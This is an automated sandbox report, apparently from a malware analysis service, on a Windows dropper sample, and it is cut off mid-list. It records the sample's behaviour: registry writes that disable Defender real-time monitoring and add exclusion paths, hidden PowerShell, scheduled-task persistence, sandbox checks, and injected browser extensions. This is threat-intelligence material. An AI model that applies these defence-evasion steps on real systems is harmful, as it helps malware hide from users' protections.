Analysis
-
max time kernel
206s -
max time network
208s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
30/05/2024, 23:18
Static task
static1
Behavioral task
behavioral1
Sample
9c073f373478de7ebfb0a1cf8021095ecb24e07e5e5870ae0ea6c03f71d4ef34.exe
Resource
win7-20240508-en
General
-
Target
9c073f373478de7ebfb0a1cf8021095ecb24e07e5e5870ae0ea6c03f71d4ef34.exe
-
Size
7.3MB
-
MD5
f821be97eae32226308cc4cb0b7892a3
-
SHA1
96527037633e9b525b84da8772ec213783bf6041
-
SHA256
9c073f373478de7ebfb0a1cf8021095ecb24e07e5e5870ae0ea6c03f71d4ef34
-
SHA512
007cc893e3d2f92b7f8e8c0afc4d7360b943b03ff6f6f964e7f1330ed2341229402c507f0e1485973e310af065ace3df85287b89f3b8d9aed7ee6fe6c10661cd
-
SSDEEP
196608:91O639u0W4n6CvwtKRXhgYHVHmvKxDMSCitowBfq09B4gU7f+8+:3O639NWo6w8U/1Hmv83to0q0zU7WF
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\FtTPlVLhSaUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OOuPExCnaYTU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\mpUBPkkqU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\tQtOyvtwIjTyC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\xWvzdveufkqfSjMY = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\xWvzdveufkqfSjMY = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\rHfQGqiujvxkYJuQWHR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\AqxqdgaLLZTMdtrEC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\tQtOyvtwIjTyC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\mpUBPkkqU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\HNIqBcslfBUMDlVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\xWvzdveufkqfSjMY = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OOuPExCnaYTU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\xWvzdveufkqfSjMY = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\FtTPlVLhSaUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\rHfQGqiujvxkYJuQWHR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\HNIqBcslfBUMDlVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\AqxqdgaLLZTMdtrEC = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 24 1248 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell and hide display window.
pid Process 2952 powershell.exe 3068 powershell.exe 1812 powershell.exe 1552 powershell.exe 2408 powershell.exe 2568 powershell.exe 3040 powershell.exe 884 powershell.EXE 2232 powershell.EXE 2556 powershell.EXE -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Control Panel\International\Geo\Nation JMxOicC.exe -
Executes dropped EXE 4 IoCs
pid Process 1228 Install.exe 2696 Install.exe 1592 ubbKbcd.exe 2964 JMxOicC.exe -
Loads dropped DLL 23 IoCs
pid Process 2992 9c073f373478de7ebfb0a1cf8021095ecb24e07e5e5870ae0ea6c03f71d4ef34.exe 1228 Install.exe 1228 Install.exe 1228 Install.exe 1228 Install.exe 2696 Install.exe 2696 Install.exe 2696 Install.exe 480 WerFault.exe 480 WerFault.exe 480 WerFault.exe 1248 rundll32.exe 1248 rundll32.exe 1248 rundll32.exe 1248 rundll32.exe 1276 WerFault.exe 1276 WerFault.exe 1276 WerFault.exe 1276 WerFault.exe 1276 WerFault.exe 2788 WerFault.exe 2788 WerFault.exe 2788 WerFault.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json JMxOicC.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json JMxOicC.exe -
Drops file in System32 directory 27 IoCs
description ioc Process File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326 JMxOicC.exe File created C:\Windows\system32\GroupPolicy\gpt.ini ubbKbcd.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol JMxOicC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4 JMxOicC.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA JMxOicC.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686 JMxOicC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686 JMxOicC.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol ubbKbcd.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini ubbKbcd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326 JMxOicC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat JMxOicC.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol ubbKbcd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA JMxOicC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA JMxOicC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4 JMxOicC.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA JMxOicC.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\rHfQGqiujvxkYJuQWHR\aCRaaEC.dll JMxOicC.exe File created C:\Program Files (x86)\rHfQGqiujvxkYJuQWHR\qOrmXMO.xml JMxOicC.exe File created C:\Program Files (x86)\FtTPlVLhSaUn\mRfWjpM.dll JMxOicC.exe File created C:\Program Files (x86)\mpUBPkkqU\vIKWnI.dll JMxOicC.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja JMxOicC.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi JMxOicC.exe File created C:\Program Files (x86)\mpUBPkkqU\PkylmLl.xml JMxOicC.exe File created C:\Program Files (x86)\OOuPExCnaYTU2\gvjIvKWWrnNIo.dll JMxOicC.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi JMxOicC.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak JMxOicC.exe File created C:\Program Files (x86)\tQtOyvtwIjTyC\KqABNFU.xml JMxOicC.exe File created C:\Program Files (x86)\OOuPExCnaYTU2\qHPCWnw.xml JMxOicC.exe File created C:\Program Files (x86)\tQtOyvtwIjTyC\HDrnLJd.dll JMxOicC.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bLzeoVMxrLqUlFeJJd.job schtasks.exe File created C:\Windows\Tasks\gcaOKtldTodyQokzi.job schtasks.exe File created C:\Windows\Tasks\WDtolTrtWazUMxY.job schtasks.exe File created C:\Windows\Tasks\ffSBZYZjRJDDYrjLt.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 480 1592 WerFault.exe 62 1276 2696 WerFault.exe 29 2788 2964 WerFault.exe 227 -
Creates scheduled task(s) 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2124 schtasks.exe 1944 schtasks.exe 1544 schtasks.exe 2032 schtasks.exe 644 schtasks.exe 888 schtasks.exe 2008 schtasks.exe 1480 schtasks.exe 1028 schtasks.exe 2604 schtasks.exe 588 schtasks.exe 2460 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached ubbKbcd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs JMxOicC.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust JMxOicC.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs JMxOicC.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ubbKbcd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My JMxOicC.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates JMxOicC.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections JMxOicC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople JMxOicC.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates JMxOicC.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates JMxOicC.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0097000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 JMxOicC.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6F694611-CA61-4BFB-9D5A-BAF943DFEE5B}\WpadDecisionTime = 20fe58e9e7b2da01 JMxOicC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA JMxOicC.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6F694611-CA61-4BFB-9D5A-BAF943DFEE5B}\WpadNetworkName = "Network 3" JMxOicC.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs JMxOicC.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\7e-6d-17-d9-50-12\WpadDecisionTime = 20fe58e9e7b2da01 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust JMxOicC.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6F694611-CA61-4BFB-9D5A-BAF943DFEE5B} JMxOicC.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs JMxOicC.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs JMxOicC.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6F694611-CA61-4BFB-9D5A-BAF943DFEE5B}\7e-6d-17-d9-50-12 rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0097000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" JMxOicC.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\7e-6d-17-d9-50-12\WpadDecisionTime = 20fe58e9e7b2da01 JMxOicC.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs JMxOicC.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs JMxOicC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA JMxOicC.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs JMxOicC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings JMxOicC.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates JMxOicC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates JMxOicC.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000000079dbce7b2da01 ubbKbcd.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\7e-6d-17-d9-50-12\WpadDecisionReason = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates JMxOicC.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates JMxOicC.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs JMxOicC.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" JMxOicC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot JMxOicC.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs JMxOicC.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates JMxOicC.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs JMxOicC.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs JMxOicC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed JMxOicC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ JMxOicC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\7e-6d-17-d9-50-12\WpadDecision = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople JMxOicC.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6F694611-CA61-4BFB-9D5A-BAF943DFEE5B}\WpadDecisionReason = "1" JMxOicC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" JMxOicC.exe -
Suspicious behavior: EnumeratesProcesses 39 IoCs
pid Process 2568 powershell.exe 2568 powershell.exe 2568 powershell.exe 3040 powershell.exe 2952 powershell.exe 2952 powershell.exe 2952 powershell.exe 884 powershell.EXE 884 powershell.EXE 884 powershell.EXE 2232 powershell.EXE 2232 powershell.EXE 2232 powershell.EXE 3068 powershell.exe 2556 powershell.EXE 2556 powershell.EXE 2556 powershell.EXE 1812 powershell.exe 1812 powershell.exe 1812 powershell.exe 2964 JMxOicC.exe 2964 JMxOicC.exe 2964 JMxOicC.exe 2964 JMxOicC.exe 2964 JMxOicC.exe 2964 JMxOicC.exe 2964 JMxOicC.exe 2964 JMxOicC.exe 1552 powershell.exe 2408 powershell.exe 2964 JMxOicC.exe 2964 JMxOicC.exe 2964 JMxOicC.exe 2964 JMxOicC.exe 2964 JMxOicC.exe 2964 JMxOicC.exe 2964 JMxOicC.exe 2964 JMxOicC.exe 2964 JMxOicC.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2568 powershell.exe Token: SeDebugPrivilege 3040 powershell.exe Token: SeIncreaseQuotaPrivilege 756 WMIC.exe Token: SeSecurityPrivilege 756 WMIC.exe Token: SeTakeOwnershipPrivilege 756 WMIC.exe Token: SeLoadDriverPrivilege 756 WMIC.exe Token: SeSystemProfilePrivilege 756 WMIC.exe Token: SeSystemtimePrivilege 756 WMIC.exe Token: SeProfSingleProcessPrivilege 756 WMIC.exe Token: SeIncBasePriorityPrivilege 756 WMIC.exe Token: SeCreatePagefilePrivilege 756 WMIC.exe Token: SeBackupPrivilege 756 WMIC.exe Token: SeRestorePrivilege 756 WMIC.exe Token: SeShutdownPrivilege 756 WMIC.exe Token: SeDebugPrivilege 756 WMIC.exe Token: SeSystemEnvironmentPrivilege 756 WMIC.exe Token: SeRemoteShutdownPrivilege 756 WMIC.exe Token: SeUndockPrivilege 756 WMIC.exe Token: SeManageVolumePrivilege 756 WMIC.exe Token: 33 756 WMIC.exe Token: 34 756 WMIC.exe Token: 35 756 WMIC.exe Token: SeDebugPrivilege 2952 powershell.exe Token: SeDebugPrivilege 884 powershell.EXE Token: SeDebugPrivilege 2232 powershell.EXE Token: SeDebugPrivilege 3068 powershell.exe Token: SeAssignPrimaryTokenPrivilege 864 WMIC.exe Token: SeIncreaseQuotaPrivilege 864 WMIC.exe Token: SeSecurityPrivilege 864 WMIC.exe Token: SeTakeOwnershipPrivilege 864 WMIC.exe Token: SeLoadDriverPrivilege 864 WMIC.exe Token: SeSystemtimePrivilege 864 WMIC.exe Token: SeBackupPrivilege 864 WMIC.exe Token: SeRestorePrivilege 864 WMIC.exe Token: SeShutdownPrivilege 864 WMIC.exe Token: SeSystemEnvironmentPrivilege 864 WMIC.exe Token: SeUndockPrivilege 